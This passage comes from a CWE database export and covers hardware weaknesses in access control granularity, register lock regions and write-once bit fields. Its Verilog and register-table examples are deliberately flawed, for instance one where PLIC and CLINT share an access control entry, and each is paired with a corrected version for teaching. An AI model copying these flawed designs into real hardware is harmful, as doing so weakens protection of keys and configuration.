"ExampleCode": "...\n\n **logic [512-1:0] data_d,** data_q;\n ...\n logic [512-1:0] pass_data;\n ...\n\n```\n\t Write: begin\n\t\t ...\n\t\t\t if (pass_mode) begin\n```\npass_data = data_d;** \n\t\t\t\t state_d = PassChk;\n\t\t\t\t pass_mode = 1'b0;\n\t\t\t\t ...\n\t\t\t end\n\t ...",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1191"
]
] |
[] |
1220
|
Insufficient Granularity of Access Control
|
Base
|
Simple
|
Incomplete
|
The product implements access controls via a policy or other feature with the intention to disable or restrict accesses (reads and/or writes) to assets in a system from untrusted agents. However, implemented access controls lack required granularity, which renders the control policy too broad because it allows accesses from unauthorized agents to the security-sensitive assets.
|
Integrated circuits and hardware engines can expose accesses to assets (device configuration, keys, etc.) to trusted firmware or a software module (commonly set by BIOS/bootloader). This access is typically access-controlled. Upon a power reset, the hardware or system usually starts with default values in registers, and the trusted firmware (Boot firmware) configures the necessary access-control protection.
A common weakness that can exist in such protection schemes is that access controls or policies are not granular enough. This condition allows agents beyond trusted agents to access assets and could lead to a loss of functionality or the ability to set up the device securely. This further results in security risks from leaked, sensitive, key material to modification of device configuration.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases.",
"Phase": "Architecture and Design"
},
{
"Note": "Such issues could be introduced during hardware implementation and identified later during Testing or System Configuration phases.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"Execute Unauthorized Code or Commands",
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism",
"Other"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "\n\n - Access-control-policy protections must be reviewed for design inconsistency and common weaknesses.\n\n - Access-control-policy definition and programming flow must be tested in pre-silicon, post-silicon testing.\n\n",
"Effectiveness": "High",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation",
"Testing"
],
"Strategy": null
}
] |
[
{
"Description": "A form hosting website only checks the session authentication status for a single form, making it possible to bypass authentication when there are multiple forms",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-24985",
"Reference": "CVE-2022-24985"
},
{
"Description": "An operating system has an overly permission Access Control List onsome system files, including those related to user passwords",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-36934",
"Reference": "CVE-2021-36934"
}
] | null | null |
[
"1",
"180"
] |
[
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1346",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2019",
"Publisher": null,
"Section": null,
"Title": "axi_node_intf_wrap.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac19/blob/619e9fb0ef32ee1e01ad76b8732a156572c65700/src/axi_node/src/axi_node_intf_wrap.sv#L430",
"URLDate": "2023-09-18"
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1347",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2019",
"Publisher": null,
"Section": null,
"Title": "axi_node_intf_wrap.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac19/blob/2078f2552194eda37ba87e54cbfef10f1aa41fa5/src/axi_node/src/axi_node_intf_wrap.sv#L430",
"URLDate": "2023-09-18"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-02-05",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2020-06-25",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Observed_Examples, References",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "Provided Demonstrative Example for Hardware Root of Trust",
"ContributionDate": "2021-07-16",
"ContributionName": null,
"ContributionOrganization": "Cycuity (originally submitted as Tortuga Logic)",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Shaza Zeitouni, Mohamadreza Rostami, Pouya Mahmoody, Ahmad-Reza Sadeghi",
"ContributionOrganization": "Technical University of Darmstadt",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Rahul Kande, Chen Chen, Jeyavijayan Rajendran",
"ContributionOrganization": "Texas A&M University",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider a system with a register for storing AES key for encryption or decryption. The key is 128 bits, implemented as a set of four 32-bit registers. The key registers are assets and registers, AES_KEY_READ_POLICY and AES_KEY_WRITE_POLICY, and are defined to provide necessary access controls.\n\n\nThe read-policy register defines which agents can read the AES-key registers, and write-policy register defines which agents can program or write to those registers. Each register is a 32-bit register, and it can support access control for a maximum of 32 agents. The number of the bit when set (i.e., \"1\") allows respective action from an agent whose identity matches the number of the bit and, if \"0\" (i.e., Clear), disallows the respective action to that corresponding agent.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "| Register | Field description | \n| --- | --- |\n| AES_ENC_DEC_KEY_0 | AES key [0:31] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_1 | AES key [32:63] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_2 | AES key [64:95] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_4 | AES key [96:127] for encryption or decryption Default 0x00000000 |\n| AES_KEY_READ_WRITE_POLICY | [31:0] Default 0x00000006 - meaning agent with identities \"1\" and \"2\" can both read from and write to key registers |",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "In the above example, there is only one policy register that controls access to both read and write accesses to the AES-key registers, and thus the design is not granular enough to separate read and writes access for different agents. Here, agent with identities \"1\" and \"2\" can both read and write.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "A good design should be granular enough to provide separate access controls to separate actions. Access control for reads should be separate from writes. Below is an example of such implementation where two policy registers are defined for each of these actions. The policy is defined such that: the AES-key registers can only be read or used by a crypto agent with identity \"1\" when bit #1 is set. The AES-key registers can only be programmed by a trusted firmware with identity \"2\" when bit #2 is set.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "| | \n|\n| AES_KEY_READ_POLICY | [31:0] Default 0x00000002 - meaning only Crypto engine with identity \"1\" can read registers: AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3 |\n| AES_KEY_WRITE_POLICY | [31:0] Default 0x00000004 - meaning only trusted firmware with identity \"2\" can program registers: AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3 |",
"IntroText": null,
"Language": null,
"Nature": "Good",
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Within the AXI node interface wrapper module in the RISC-V AXI module of the HACK@DAC'19 CVA6 SoC [REF-1346], an access control mechanism is employed to regulate the access of different privileged users to peripherals.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The AXI ensures that only users with appropriate privileges can access specific peripherals. For instance, a ROM module is accessible exclusively with Machine privilege, and AXI enforces that users attempting to read data from the ROM must possess machine privilege; otherwise, access to the ROM is denied. The access control information and configurations are stored in a ROM.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t...\n\t\tfor (i=0; i<NB_SUBORDINATE; i++)\n\t\t begin \n\t\t\tfor (j=0; j<NB_MANAGER; j++)\n\t\t\t begin \n```\nassign connectivity_map_o[i][j] = access_ctrl_i[i][j][priv_lvl_i] || ((j==6) && access_ctrl_i[i][7][priv_lvl_i]);** end end ...",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "However, in the example code above, while assigning distinct privileges to AXI manager and subordinates, both the Platform-Level Interrupt Controller Specification (PLIC) and the Core-local Interrupt Controller (CLINT) (which are peripheral numbers 6 and 7 respectively) utilize the same access control configuration. This common configuration diminishes the granularity of the AXI access control mechanism.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "In certain situations, it might be necessary to grant higher privileges for accessing the PLIC than those required for accessing the CLINT. Unfortunately, this differentiation is overlooked, allowing an attacker to access the PLIC with lower privileges than intended.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "As a consequence, unprivileged code can read and write to the PLIC even when it was not intended to do so. In the worst-case scenario, the attacker could manipulate interrupt priorities, potentially modifying the system's behavior or availability.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To address the aforementioned vulnerability, developers must enhance the AXI access control granularity by implementing distinct access control entries for the Platform-Level Interrupt Controller (PLIC) and the Core-local Interrupt Controller (CLINT). By doing so, different privilege levels can be defined for accessing PLIC and CLINT, effectively thwarting the potential attacks previously highlighted. This approach ensures a more robust and secure system, safeguarding against unauthorized access and manipulation of interrupt priorities. [REF-1347]",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t...\n\t\tfor (i=0; i<NB_SUBORDINATE; i++)\n\t\t begin \n\t\t\tfor (j=0; j<NB_MANAGER; j++)\n\t\t\t begin \n```\nassign connectivity_map_o[i][j] = access_ctrl_i[i][j][priv_lvl_i];** end end ...",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider the following SoC design. The sram in HRoT has an address range that is readable and writable by unprivileged software and it has an area that is only readable by unprivileged software. The tbus interconnect enforces access control for subordinates on the bus but uses only one bit to control both read and write access. Address 0xA0000000 - 0xA000FFFF is readable and writable by the untrusted cores core{0-N} and address 0xA0010000 - 0xA001FFFF is only readable by the untrusted cores core{0-N}.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The security policy access control is not granular enough, as it uses one bit to enable both read and write access. This gives write access to an area that should only be readable by unprivileged agents. \n\n\n Access control logic should differentiate between read and write access and to have sufficient address granularity.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1220"
]
] |
[
"1222"
] |
1222
|
Insufficient Granularity of Address Regions Protected by Register Locks
|
Variant
|
Simple
|
Incomplete
|
The product defines a large address region protected from modification by the same register lock control bit. This results in a conflict between the functional requirement that some addresses need to be writable by software during operation and the security requirement that the system configuration lock bit must be set during the boot process.
|
Integrated circuits and hardware IPs can expose the device configuration controls that need to be programmed after device power reset by a trusted firmware or software module (commonly set by BIOS/bootloader) and then locked from any further modification. In hardware design, this is commonly implemented using a programmable lock bit which enables/disables writing to a protected set of registers or address regions. When the programmable lock bit is set, the relevant address region can be implemented as a hardcoded value in hardware logic that cannot be changed later.
A problem can arise wherein the protected region definition is not granular enough. After the programmable lock bit has been set, then this new functionality cannot be implemented without change to the hardware design.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "System on Chip",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Such issues are introduced during hardware architecture and design since software controls and configuration are defined during these phases and identified later during Testing or System Configuration phases.",
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Other"
],
"Likelihood": null,
"Note": "System security configuration cannot be defined in a way that does not conflict with functional requirements of device.",
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "\n\nThe defining of protected locked registers should be reviewed or tested early in the design phase with software teams to ensure software flows are not blocked by the security locks.\n\n\nAs an alternative to using register lock control bits and fixed access control regions, the hardware design could use programmable security access control configuration so that device trusted firmware can configure and change the protected regions based on software usage and security models.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] | null | null | null |
[
"679"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2019-12-12",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "1220",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "For example, consider a hardware unit with a 32 kilobyte configuration address space where the first 8 kilobyte address contains security sensitive controls that must only be writable by device bootloader. One way to protect the security configuration could be to define a 32 bit system configuration locking register (SYS_LOCK) where each bit lock locks the corresponding 1 kilobyte region.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "| Address | Register | \n| --- | --- |\n| 0x0000 | SYS_LOCK: 32 bit system configuration lock register, each bit is write-1-once |\n| 0x0004 | SECURITY_FEATURE_ENABLE: 32 bit register controlling enabling of security features |\n| ... | |\n| 0x0310 | SW_MODE: 32 bit Software Mode indication register |\n\n\t| Address region | Lock bit | \n| --- | --- |\n| 0x0000 - 0x03FF | SYS_LOCK[0] |\n| 0x0400 - 0x07FF | SYS_LOCK[1] |\n| ... | |\n| 0x7C00 - 0x7FFF | SYS_LOCK[31] |",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "If a register exists within the first kilobyte address range (e.g. SW_MODE, address 0x310) and needs to be software writable at runtime, then this register cannot be written in a securely configured system since SYS_LOCK register lock bit 0 must be set to protect other security settings (e.g. SECURITY_FEATURE_ENABLE, address 0x0004). The only fix would be to change the hardware logic or not set the security lock bit.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1220",
"1222"
]
] |
[] |
1224
|
Improper Restriction of Write-Once Bit Fields
|
Base
|
Simple
|
Incomplete
|
The hardware design control register "sticky bits" or write-once bit fields are improperly implemented, such that they can be reprogrammed by software.
|
Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to define default values that are hard coded in the hardware description language (HDL) code of the hardware unit. A common security protection method used to protect register settings from modification by software is to make the settings write-once or "sticky." This allows writing to such registers only once, whereupon they become read-only. This is useful to allow initial boot software to configure systems settings to secure values while blocking runtime software from modifying such hardware settings.
Failure to implement write-once restrictions in hardware design can expose such registers to being re-programmed by software and written multiple times. For example, write-once fields could be implemented to only be write-protected if they have been set to value "1", wherein they would work as "write-1-once" and not "write-once".
|
[
{
"Class": null,
"Name": "Verilog",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "VHDL",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "System on Chip",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "Such issues could be introduced during implementation of hardware design, since IP parameters and defaults are defined in HDL code and identified later during Testing or System Configuration phases.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Varies by Context"
],
"Likelihood": null,
"Note": "System configuration cannot be programmed in a secure way.",
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "During hardware design all register write-once or sticky fields must be evaluated for proper configuration.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "The testing phase should use automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Testing"
],
"Strategy": null
}
] | null | null | null |
[
"680"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2019-12-12",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
